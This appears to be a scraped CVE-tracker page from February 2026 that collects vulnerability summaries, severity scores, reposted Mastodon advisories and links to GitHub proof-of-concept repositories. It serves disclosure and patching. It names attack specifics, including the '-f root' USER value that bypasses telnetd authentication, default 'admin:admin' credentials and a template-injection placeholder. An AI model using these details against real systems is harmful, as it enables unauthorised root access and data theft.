🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:20:23.000Z ##

🔴 CVE-2025-69633 - Critical (9.8)

A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2474
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-17T15:32:42

4 posts

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom(). The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) is supplied, the expression length + 1u causes an integer wraparound, resulting in a zero-byte allocation. The subsequent call to getrandom(data, length,

thehackerwire@mastodon.social at 2026-02-17T16:12:30.000Z ##

🟠 CVE-2026-2474 - High (7.5)

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().

The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:54.000Z ##

🟠 CVE-2026-2474 - High (7.5)

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().

The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:12:30.000Z ##

🟠 CVE-2026-2474 - High (7.5)

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().

The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:54.000Z ##

🟠 CVE-2026-2474 - High (7.5)

Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().

The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2447
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-17T15:32:41

6 posts

Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Firefox ESR < 140.7.1, and Firefox ESR < 115.32.1.

Pat972@mastodon.social at 2026-02-18T14:56:19.000Z ##

RE: infosec.exchange/@beyondmachin

Mozilla publie des mises à jour de sécurité pour Firefox et Thunderbird

Mozilla a publié des mises à jour de sécurité pour Firefox et Thunderbird afin de corriger un débordement de mémoire tampon de grande gravité (CVE-2026-2447) dans la bibliothèque libvpx qui permet l'exécution de code à distance par le biais d'un contenu vidéo malformé.

#cybersécurité #infosec #conseil #vulnérabilité
#cybersecurity #infosec #advisory #vulnerability
___

##

beyondmachines1 at 2026-02-18T14:01:24.642Z ##

Mozilla Releases Security Updates for Firefox and Thunderbird

Mozilla released security updates for Firefox and Thunderbird to patch a high-severity heap buffer overflow (CVE-2026-2447) in the libvpx library that allows remote code execution via malformed video content.

**If you're using Mozilla Firefox or Thunderbird enable automatic updates for your browsers and mail clients and force an update. Even if the flaw is not critical, it's still better to update the browser and email client - they are your windows into the internet. Since this vulnerability can be triggered just by visiting a website or playing a video, patching is your best defense.**

beyondmachines.net/event_detai

##

thehackerwire@mastodon.social at 2026-02-17T16:02:15.000Z ##

🟠 CVE-2026-2447 - High (8.8)

Heap buffer overflow in libvpx. This vulnerability affects Firefox &lt; 147.0.4, Firefox ESR &lt; 140.7.1, Firefox ESR &lt; 115.32.1, Thunderbird &lt; 140.7.2, and Thunderbird &lt; 147.0.2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

beyondmachines1@infosec.exchange at 2026-02-18T14:01:24.000Z ##

Mozilla Releases Security Updates for Firefox and Thunderbird

Mozilla released security updates for Firefox and Thunderbird to patch a high-severity heap buffer overflow (CVE-2026-2447) in the libvpx library that allows remote code execution via malformed video content.

**If you're using Mozilla Firefox or Thunderbird enable automatic updates for your browsers and mail clients and force an update. Even if the flaw is not critical, it's still better to update the browser and email client - they are your windows into the internet. Since this vulnerability can be triggered just by visiting a website or playing a video, patching is your best defense.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

Mozilla@activitypub.awakari.com at 2026-02-16T20:41:52.000Z ## Slackware 15.0 Mozilla Thunderbird Critical Buffer Overflow CVE-2026-2447 New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix a security issue.

#Slackware #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

thehackerwire@mastodon.social at 2026-02-17T16:02:15.000Z ##

🟠 CVE-2026-2447 - High (8.8)

Heap buffer overflow in libvpx. This vulnerability affects Firefox &lt; 147.0.4, Firefox ESR &lt; 140.7.1, Firefox ESR &lt; 115.32.1, Thunderbird &lt; 140.7.2, and Thunderbird &lt; 147.0.2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2616
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-17T15:31:36

2 posts

A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the local network. The exploit has been disclosed to the public and may be used. It is advisable to modify the configuration settings. The vendor was contacted

thehackerwire@mastodon.social at 2026-02-17T16:00:11.000Z ##

🟠 CVE-2026-2616 - High (8.8)

A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the lo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:00:11.000Z ##

🟠 CVE-2026-2616 - High (8.8)

A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the lo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1731
(9.8 CRITICAL)

EPSS: 49.74%

updated 2026-02-17T13:40:10.320000

1 posts

BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.

Nuclei template

4 repos

https://github.com/win3zz/CVE-2026-1731

https://github.com/bytehazard/CVE-2026-1731

https://github.com/cybrdude/cve-2026-1731-scanner

https://github.com/jakubie07/CVE-2026-1731

youranonnewsirc@nerdculture.de at 2026-02-17T03:50:08.000Z ##

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

##

CVE-2026-2247(CVSS UNKNOWN)

EPSS: 0.10%

updated 2026-02-17T12:31:18

2 posts

SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generation of reports, which occurs when a previously authenticated remote attacker executes a malicious payload in the URL generated after downloading the student's report card in the ‘Day-to-day’ section from the mobile application. In the URL of the generated PDF, the session token used does not expire, so it remains vali

offseq at 2026-02-17T13:00:36.021Z ##

CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-17T13:00:36.000Z ##

CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! radar.offseq.com/threat/cve-20 #OffSeq #SQLi #InfoSec #EduSec

##

CVE-2025-7631
(8.6 HIGH)

EPSS: 0.03%

updated 2026-02-17T12:31:13

1 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.This issue affects Tumeva News Software: through 17022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-02-17T12:44:18.000Z ##

🟠 CVE-2025-7631 - High (8.6)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2592
(7.7 HIGH)

EPSS: 0.07%

updated 2026-02-17T06:31:26

2 posts

The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' failing to validate that the authority token provided in the callback URL belongs to the specific order being marked as paid. This makes it possible for unau

1 repos

https://github.com/drkim-dev/CVE-2026-25924

offseq@infosec.exchange at 2026-02-17T06:00:29.000Z ##

🛡️ CVE-2026-2592 (HIGH, CVSS 7.7): Zarinpal Gateway for WooCommerce has improper access control — orders can be marked as paid via reused authority tokens. All versions affected. Audit callback validation & monitor for fraud. Details: radar.offseq.com/threat/cve-20 #OffSeq #WooCommerce #WordPress

##

thehackerwire@mastodon.social at 2026-02-17T05:16:30.000Z ##

🟠 CVE-2026-2592 - High (7.7)

The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' fail...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-26220(CVSS UNKNOWN)

EPSS: 0.55%

updated 2026-02-17T03:30:16

1 posts

LightLLM version 1.1.0 and prior contain an unauthenticated remote code execution vulnerability in PD (prefill-decode) disaggregation mode. The PD master node exposes WebSocket endpoints that receive binary frames and pass the data directly to pickle.loads() without authentication or validation. A remote attacker who can reach the PD master can send a crafted payload to achieve arbitrary code exec

offseq@infosec.exchange at 2026-02-17T08:30:38.000Z ##

⚠️ CRITICAL: CVE-2026-26220 in ModelTC LightLLM ≤1.1.0 allows unauth RCE via unsafe pickle deserialization on WebSocket endpoints. Restrict PD master node access & monitor for attacks. No patch yet — act now! radar.offseq.com/threat/cve-20 #OffSeq #infosec #CVE202626220 #rce

##

CVE-2025-12062
(8.8 HIGH)

EPSS: 0.06%

updated 2026-02-17T00:30:19

1 posts

The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .html files on the server, allowing the executio

thehackerwire@mastodon.social at 2026-02-17T00:19:03.000Z ##

🟠 CVE-2025-12062 - High (8.8)

The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it poss...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2564
(8.1 HIGH)

EPSS: 0.04%

updated 2026-02-16T18:31:31

1 posts

A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T. Affected by this vulnerability is an unknown functionality of the file /OutsideCmd. The manipulation results in weak password recovery. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitation appears to be difficult. It is recommended to upgrade the affected component

1 repos

https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE

offseq@infosec.exchange at 2026-02-17T10:00:29.000Z ##

🛑 CRITICAL vuln (CVE-2026-2564) in Intelbras VIP 3260 Z IA (2.840.00IB005.0.T): Weak password recovery via /OutsideCmd enables remote attack. No user interaction needed. Restrict access, monitor, and await patch. radar.offseq.com/threat/cve-20 #OffSeq #CVE20262564 #IoTSecurity

##

CVE-2026-1333
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-16T15:32:54

1 posts

A Use of Uninitialized Variable vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.

offseq@infosec.exchange at 2026-02-17T01:30:29.000Z ##

CVE-2026-1333 (HIGH, CVSS 7.8): SOLIDWORKS eDrawings 2025 – 2026 SP0 vulnerable to code execution via crafted EPRT files. No exploits yet, but patch and restrict file handling! radar.offseq.com/threat/cve-20 #OffSeq #vuln #SOLIDWORKS #infosec

##

CVE-2026-2451(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-02-16T12:32:02

1 posts

Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code

offseq@infosec.exchange at 2026-02-17T04:30:30.000Z ##

⚠️ CVE-2026-2451 (HIGH): pretix-doistep 1.0.0 allows backend users to abuse email template placeholders to exfiltrate config, DB passwords & API keys. Rotate creds, audit templates & restrict edit rights ASAP. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #pretix #InfoSec

##

CVE-2026-2452(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-02-16T12:32:01

1 posts

Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code

offseq@infosec.exchange at 2026-02-17T03:00:32.000Z ##

🔒 CVE-2026-2452 (HIGH): pretix-newsletter 1.0.0 & 2.0.0 let backend users leak sensitive data by abusing placeholders in email templates. Rotate credentials, restrict edit rights, and monitor changes! More: radar.offseq.com/threat/cve-20 #OffSeq #Vuln #pretix #Infosec

##

CVE-2026-2577
(10.0 CRITICAL)

EPSS: 0.06%

updated 2026-02-16T12:32:00

1 posts

The WhatsApp bridge component in Nanobot binds the WebSocket server to all network interfaces (0.0.0.0) on port 3001 by default and does not require authentication for incoming connections. An unauthenticated remote attacker with network access to the bridge can connect to the WebSocket server to hijack the WhatsApp session. This allows the attacker to send messages on behalf of the user, intercep

Matchbook3469@mastodon.social at 2026-02-18T10:06:10.000Z ##

🔴 New security advisory:

CVE-2026-2577 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
advisory.yazoul.net/cve/cve-20

#Cybersecurity #SecurityPatching #HackerNews

##

CVE-2026-26369
(9.8 CRITICAL)

EPSS: 0.01%

updated 2026-02-15T18:30:25

3 posts

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/management specifying their own username to elevate their account to the UG_ADMIN group, bypassing intended access controls and gaining administrative capabiliti

thehackerwire@mastodon.social at 2026-02-16T22:57:57.000Z ##

🔴 CVE-2026-26369 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:00.000Z ##

🔴 CVE-2026-26369 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:37:51.000Z ##

🔴 CVE-2026-26369 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-26366
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-02-15T18:30:24

2 posts

eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default credentials to gain administrative access to sensitive smart home configuration and control functions.

thehackerwire@mastodon.social at 2026-02-16T22:57:09.000Z ##

🔴 CVE-2026-26366 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:06.000Z ##

🔴 CVE-2026-26366 - Critical (9.8)

eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-32062
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-15T12:30:34

3 posts

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buffer overflow when receiving a specific packet on the established upper layer L2CAP channel. An attacker can leverage this vulnerability to obtain remote c

thehackerwire@mastodon.social at 2026-02-16T22:58:05.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:57:09.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:16.000Z ##

🟠 CVE-2025-32062 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-32058
(9.4 CRITICAL)

EPSS: 0.01%

updated 2026-02-15T12:30:34

2 posts

The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the V850 side which allows an attacker with code execution on the infotainment main SoC to perform code execution on the RH850 module and subsequently send a

thehackerwire@mastodon.social at 2026-02-16T22:57:17.000Z ##

🔴 CVE-2025-32058 - Critical (9.3)

The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:25.000Z ##

🔴 CVE-2025-32058 - Critical (9.3)

The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-32059
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-15T12:30:25

1 posts

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buffer overflow when receiving a specific packet on the established upper layer L2CAP channel. An attacker can leverage this vulnerability to obtain remote c

thehackerwire@mastodon.social at 2026-02-16T22:38:18.000Z ##

🟠 CVE-2025-32059 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1490
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-02-15T06:31:38

3 posts

The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all versions up to, and including, 6.71. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leverage

1 repos

https://github.com/comthompson30/CVE-2026-1490

undercodenews@mastodon.social at 2026-02-17T19:39:10.000Z ##

Critical Vulnerability in CleanTalk WordPress Plugin Puts 200,000 Sites at Risk

A recently discovered critical vulnerability (CVE-2026-1490, CVSS 9.8) in the CleanTalk WordPress plugin, affecting versions up to 6.71, has raised alarms for the cybersecurity community. This flaw exposes over 200,000 websites to severe threats, allowing unauthenticated attackers to exploit the vulnerability. The attackers could potentially install malicious plugins and execute remote code…

undercodenews.com/critical-vul

##

beyondmachines1@infosec.exchange at 2026-02-17T08:01:23.000Z ##

Critical CleanTalk Plugin Vulnerability Allows WordPress Site Takeover via DNS Spoofing

A critical vulnerability in the CleanTalk WordPress plugin (CVE-2026-1490) allows unauthenticated attackers to bypass authorization via Reverse DNS spoofing and install arbitrary plugins, leading to full site takeover.

**If you are using ""Spam protection, Anti-Spam, FireWall by CleanTalk", update ASAP. Never rely on DNS records for authentication because they are easily spoofed by attackers.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

thehackerwire@mastodon.social at 2026-02-16T22:57:28.000Z ##

🔴 CVE-2026-1490 - Critical (9.8)

The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-43468
(9.8 CRITICAL)

EPSS: 84.80%

updated 2026-02-13T14:04:05.243000

1 posts

Microsoft Configuration Manager Remote Code Execution Vulnerability

3 repos

https://github.com/nikallass/CVE-2024-43468_mTLS_go

https://github.com/tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468

https://github.com/synacktiv/CVE-2024-43468

PC_Fluesterer@social.tchncs.de at 2026-02-17T11:47:21.000Z ##

Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen

Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm

pc-fluesterer.info/wordpress/2

#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump

##

CVE-2026-2360
(8.1 HIGH)

EPSS: 0.05%

updated 2026-02-11T18:31:37

2 posts

PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a custom operator in the public schema and place malicious code in that operator. This operator will later be executed with superuser privileges when the extension is created. The risk is higher with PostgreSQL 14 or with instances upgraded from PostgreSQL 14 or a prior version. With PostgreS

Sempf at 2026-02-17T18:34:50.684Z ##

Why isn't anyone talking about this PostgreSQL vulnerability? nvd.nist.gov/vuln/detail/cve-2

Did y'all talk about it last week without me?

##

Sempf@infosec.exchange at 2026-02-17T18:34:50.000Z ##

Why isn't anyone talking about this PostgreSQL vulnerability? nvd.nist.gov/vuln/detail/cve-2

Did y'all talk about it last week without me?

##

CVE-2026-24061
(9.8 CRITICAL)

EPSS: 76.94%

updated 2026-02-11T15:40:42.937000

1 posts

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.

Nuclei template

61 repos

https://github.com/leonjza/inetutils-telnetd-auth-bypass

https://github.com/0x7556/CVE-2026-24061

https://github.com/madfxr/Twenty-Three-Scanner

https://github.com/parameciumzhang/Tell-Me-Root

https://github.com/yanxinwu946/CVE-2026-24061--telnetd

https://github.com/0p5cur/CVE-2026-24061-POC

https://github.com/SeptembersEND/CVE--2026-24061

https://github.com/novitahk/Exploit-CVE-2026-24061

https://github.com/infat0x/CVE-2026-24061

https://github.com/lavabyte/telnet-CVE-2026-24061

https://github.com/punitdarji/telnetd-cve-2026-24061

https://github.com/ibrahmsql/CVE-2026-24061-PoC

https://github.com/duy-31/CVE-2026-24061---telnetd

https://github.com/z3n70/CVE-2026-24061

https://github.com/SafeBreach-Labs/CVE-2026-24061

https://github.com/BrainBob/CVE-2026-24061

https://github.com/midox008/CVE-2026-24061

https://github.com/X-croot/CVE-2026-24061_POC

https://github.com/Gabs-hub/CVE-2026-24061_Lab

https://github.com/TryA9ain/CVE-2026-24061

https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061

https://github.com/mbanyamer/CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

https://github.com/shivam-bathla/CVE-2026-24061-setup

https://github.com/hilwa24/CVE-2026-24061

https://github.com/Parad0x7e/CVE-2026-24061

https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester

https://github.com/scumfrog/cve-2026-24061

https://github.com/SystemVll/CVE-2026-24061

https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-

https://github.com/Alter-N0X/CVE-2026-24061-POC

https://github.com/Chocapikk/CVE-2026-24061

https://github.com/xuemian168/CVE-2026-24061

https://github.com/ridpath/Terrminus-CVE-2026-2406

https://github.com/Ali-brarou/telnest

https://github.com/LucasPDiniz/CVE-2026-24061

https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector

https://github.com/Mr-Zapi/CVE-2026-24061

https://github.com/franckferman/CVE_2026_24061_PoC

https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root

https://github.com/hyu164/Terrminus-CVE-2026-2406

https://github.com/ilostmypassword/Melissae

https://github.com/killsystema/scan-cve-2026-24061

https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061

https://github.com/r00tuser111/CVE-2026-24061

https://github.com/buzz075/CVE-2026-24061

https://github.com/h3athen/CVE-2026-24061

https://github.com/XsanFlip/CVE-2026-24061-Scanner

https://github.com/typeconfused/CVE-2026-24061

https://github.com/Lingzesec/CVE-2026-24061-GUI

https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd

https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061

https://github.com/m3ngx1ng/cve_2026_24061_cli

https://github.com/cumakurt/tscan

https://github.com/tiborscholtz/CVE-2026-24061

https://github.com/hackingyseguridad/root

https://github.com/ms0x08-dev/CVE-2026-24061-POC

https://github.com/obrunolima1910/CVE-2026-24061

https://github.com/balgan/CVE-2026-24061

https://github.com/Mefhika120/Ashwesker-CVE-2026-24061

https://github.com/JayGLXR/CVE-2026-24061-POC

https://github.com/monstertsl/CVE-2026-24061

linux@activitypub.awakari.com at 2026-02-18T19:05:28.000Z ## Ubuntu 20.04 LTS Inetutils Important Access Issue CVE-2026-24061 Inetutils could allow unintended access to network services.

#Ubuntu #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-21510
(8.8 HIGH)

EPSS: 2.72%

updated 2026-02-10T21:31:29

1 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

1 repos

